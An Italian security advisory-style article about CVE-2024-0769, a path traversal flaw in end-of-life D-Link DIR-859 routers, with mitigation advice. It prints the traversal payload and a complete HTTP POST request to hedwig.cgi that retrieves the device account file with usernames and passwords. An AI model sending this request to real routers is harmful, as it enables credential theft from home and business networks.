Sommario
GreyNoise Labs ha recentemente scoperto una grave vulnerabilità nei router WiFi D-Link DIR-859. Identificata come CVE-2024-0769, questa vulnerabilità permette un traversal dei percorsi, portando alla divulgazione di informazioni sensibili. La vulnerabilità colpisce tutte le revisioni e i firmware dei router DIR-859, dispositivi che non riceveranno mai patch di sicurezza essendo stati dichiarati EOL.
Dettagli della Vulnerabilità
CVE-2024-0769 è una vulnerabilità di traversal dei percorsi che consente di accedere a file riservati all’interno del router, rivelando informazioni sensibili come nomi utente, password, gruppi e descrizioni di tutti gli utenti del dispositivo. L’exploit originale è stato descritto in un report disponibile qui. L’attacco utilizza il seguente payload per sfruttare la vulnerabilità:
bashCopia codice../../../../htdocs/webinc/getcfg/DHCPS6.BRIDGE-1.xml
GreyNoise ha osservato una variazione di questo exploit che rende visibile un file PHP diverso, permettendo di raccogliere informazioni complete sugli utenti del dispositivo.
Impatto e Rischi
Questa vulnerabilità rappresenta un rischio significativo, poiché permette agli attaccanti di accedere a dati sensibili e di utilizzarli per ulteriori attacchi. I router D-Link DIR-859 non riceveranno patch di sicurezza per questa vulnerabilità, aumentando il rischio di esposizione prolungata. Gli attaccanti possono sfruttare queste informazioni per compromettere ulteriormente le reti domestiche e aziendali.
Esempio di exploit osservato da GreyNoise:
xmlCopia codicePOST /hedwig.cgi HTTP/1.1
Host: <ip>:8088
Content-Length: 141
Content-Type: text/xml
Cookie: uid=R8tBjwtFc8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World)
<?xml version="1.0" encoding="utf-8"?>
<postxml><module><service>
../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml
</service></module></postxml>
Misure di Sicurezza
Gli utenti dei router D-Link DIR-859 dovrebbero considerare seriamente la sostituzione dei loro dispositivi con modelli più recenti e sicuri che ricevano aggiornamenti regolari. È fondamentale monitorare costantemente le reti per individuare eventuali attività sospette e adottare misure preventive per proteggere le informazioni sensibili.
La vulnerabilità CVE-2024-0769 nei router D-Link DIR-859 evidenzia l’importanza di mantenere aggiornati i dispositivi di rete e di sostituire quelli dichiarati End-of-Life. La sicurezza delle informazioni è fondamentale, e le vulnerabilità non risolte rappresentano un rischio elevato per gli utenti. GreyNoise Labs ha dichiarato che continuerà a monitorare l’attività relativa a questa vulnerabilità per proteggere gli utenti e migliorare la sicurezza della rete.
